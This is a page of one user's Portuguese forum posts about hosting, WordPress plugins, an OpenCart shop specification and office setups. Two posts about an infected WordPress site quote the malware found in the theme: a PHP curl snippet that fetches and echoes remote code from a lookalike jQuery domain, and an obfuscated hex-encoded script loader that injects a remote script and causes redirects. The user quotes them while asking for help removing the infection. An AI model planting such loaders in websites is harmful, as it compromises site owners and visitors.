Mensagens - afcramalho

Páginas: 1 2 3 ... 104
1
Hosting / Alterar MX Records na Amen?
« em: 21/Nov/2014 13:30 »
Boas. Na Amen onde é que se altera os MX Records para funcionar com o Google Apps?

Farto de procurar e não vejo onde fazer esta alteração no painel da Amen.

2
Antes de mais obrigado a todos pelas respostas.

Falei em privado com o cjseven e ele indicou-me que o plugin formidable pro também faz o q indiquei em cima, por isso parece que tenho a situação resolvida.

Obrigado pelas dicas ;)

3
Pessoal... uma dúvida que não tinha verificado. Seguindo esta imagem:




Temos o produto, temos a quantidade, neste caso escolhi 1 do produto ANCAR SD-150.Depois inserimos os nossos dados pessoais, email etc, e fazemos o pedido de orçamento (enviar)...



Depois é suposto ser enviado dois emails, um para o cliente, outro para o dono do site. Emails iguais para ambos... Nesse email é indicado ao cliente o valor automatico do produto... ou seja, receber um email como o de baixo:



Neste caso, foram selecionados dois produtos, e no email aparece também o valor total. Como poderei fazer isto?

4
Thanks ;)

5
WordPress / Procuro plugin de contacto que faça isto
« em: 30/Mar/2014 20:56 »
Boas a todos. Procuro um plugin wordpress que possa fazer o que está nas seguintes imagens.





Ou seja, temos uma lista de items, onde podemos colocar a quantidade de item que queremos, depois submetemos e aparece um formulário de contacto para ser enviado. Eu como admin do site, recebo um email com os dados do formulario de contacto, o item selecionado e a quantidade do mesmo.

Desde já obrigado.

6
Conversa Geral / Re: Deal Extreme
« em: 02/Fev/2014 18:38 »
Isso demora sempre muito, mesmo muito... mas chega.

7
E-commerce / Re: OpenCart - Dá para fazer isto tudo?
« em: 01/Fev/2014 19:20 »
Digam-me só uma coisa... em relação ao SAF-T PT (Standard Audit File for Tax purposes). Existe algum modulo um assim que gere logo esse ficheiro?

8
Conversa Geral / Re: Mostra o teu escritório
« em: 31/Jan/2014 17:00 »
Bom setup ;)

Mas... aquilo que tens em cima do subwoofer são discos?

Sim eu sei, não se deve colocar os discos por cima do subwoofer, coisa que me percebi logo depois de arrumar o local e tirar as fotos... retirei de cima, mas não me apeteceu fotografar de novo :p

9
Conversa Geral / Re: Mostra o teu escritório
« em: 31/Jan/2014 14:22 »
Aqui fica o meu.

- Macbook Pro Retina Late 2013 (i7-2.3GHz/16GB/520SSD/GT750m)
- Monitor HP w2207, base mStand
- Headphones Wireless Sennheiser RS 170
- Colunas Logitech X-230
- 3 discos externos Western Digital de 3TB cada
- Rato MX Revolution e Teclado MX 5500 ambos bluetooth

Discos, impressora, colunas e headphones, e outros componentes usb ligados a um Hub que por sua vez passa apenas um fio usb para o macbook.






10
E-commerce / Re: OpenCart - Dá para fazer isto tudo?
« em: 31/Jan/2014 14:09 »
Desde já obrigado a todos pela ajuda... vou avançar com o site em opencart então e vamos ver como corre, pelo jeito com alguns modulos resolvo a maioria dos problemas era o que queria saber... obrigado ;)

11
Preciso de alguém com experiência, que possa ajudar neste projecto: http://forum.maistrafego.pt/index.php?topic=43745.msg431035#msg431035

Enviar Mensagem Privada.

Cumprimentos.

12
E-commerce / OpenCart - Dá para fazer isto tudo?
« em: 30/Jan/2014 20:34 »
Boas. Tenho um cliente que precisa de uma loja online com uma série de funções que não sei se são possiveis utilizando por exemplo OpenCart, e caso não sejam terei de associar um programador ao projecto... alguém que me possa esclarecer por favor.

O site deve conter:
-quando se entra no site deve ter um quadro inicial para colocar o email, cidade e inscreve-te, só depois é que se entra no site. Tal como está neste site http://www.groupon.pt/
-dentro das paginas deve ter 6 formularios (1 de contactos, outro de registo no site, outro de parceiros, outro de reclamações, outro de indique um amigo e outro de indique uma empresa)
-pagamentos por multibanco e cartao de credito ou paypal
- várias paginas e subpaginas
-ofertas também na coluna da direita e o gosto do facebook e outras redes sociais em baixo das ofertas tal como esta no http://www.happymoments.pt/  
-estatisticas para saber quantas pessoas vêem o site
-botão para “inscreva-se na newsletter”
 
- quando o cliente faz a compra deve sair um email com o voucher e para além disso também deve receber um email com os dados de facturação para ele e deve haver um backoffice e o dinheiro tem que caír na administração do site, ou seja tem que existir lá um documento com um resumo do valor diário com os dados de facturação, de forma que depois seja possível enviar esse resumo para a contabilidade para enviar o saft-pt para as finanças
 
- Na oferta e quando clicamos na imagem do anuncio deve aparecer o titulo a descrição inicial, o valor anterior, a percentagem de desconto, a poupança, o valor actual a pagar, o numero de pessoas que já compraram o produto, ao fim de quanto tempo termina a oferta, forma de comprar e dados de facturação de forma opcional e as redes sociais em cada oferta, como está no site groupon e no odisseias http://www.odisseias.com/restaurantes/lisboa/faz-figura-jantar-no-coracao-de-lisboa-com-vista-rio/23479. Mais abaixo toda a descrição do anuncio. No entanto na pagina inicial onde estão as ofertas também devem ter o titulo a descrição inicial, o valor anterior, a percentagem de desconto, a poupança, o valor actual a pagar, ao fim de quanto tempo termina a oferta.
- Quantas ofertas é possível colocar na pagina inicial? e quantas ofertas é possivel colocar na coluna da direita?
 
 -No formulário “indicar um amigo” deve Automatizar um credito de 4€ por amigo que aceite receber a nossa newsletter quando o amigo fizer uma compra.
-Automatizar o cartao de cliente com 5% de desconto para particulares cada vez que nas compras atinjam um determinado valor
-E para empresas cujas compras atinjam outro determinado valor

Obrigado.

13
Apresentações / Re: Ricardo Gomes
« em: 25/Nov/2013 16:41 »
Bem vindo, pessoal das Caldas é sempre muito bem vindo ;)

14
WordPress / Re: Vírus no WP
« em: 21/Jul/2013 17:30 »
Obrigado pelas respostas. Sim era problema da theme, esqueci-me de referir que foi alterada a pouco tempo, porque a anterior já estava à muitos anos e estava desatualizada em comparação a versão wordpress atual e por isso tive mesmo de fazer a alteração.

Descobri o código seguinte no header:

<?php
   if(function_exists('curl_init')){
      $url = "http://www.juquery.com/jquery-1.6.3.min.js";
         $ch = curl_init();
         $timeout = 10;
         curl_setopt($ch,CURLOPT_URL,$url);
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
         curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
      $data = curl_exec($ch);
   curl_close($ch);
echo "$data";
   }
?>

Segundo apurei era o que estava a causar o problema, mas vou analisar melhor a situação da theme para isto não ocorrer novamente. Obrigado pela ajuda a todos.

15
WordPress / Vírus no WP
« em: 21/Jul/2013 14:52 »
Boas. Tenho o site http://www.foradecena.com/ e tenho um problema, ao navegar no site ele de vez em quando re-encaminha para outros sites... tipo (http://www.games-iso.com/). Pesquisei e encontrei algum com o mesmo problema, mas não dizia a resolução, mas sei que o problema é deste código:

<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script>

Que é detectado por sites como http://sitecheck.sucuri.net/ e também era o código que a outra pessoa que encontrei com o mesmo problema tinha no site dele. O problema é que não encontro o código em parte alguma do site para o eliminar... alguma dica?

Páginas: 1 2 3 ... 104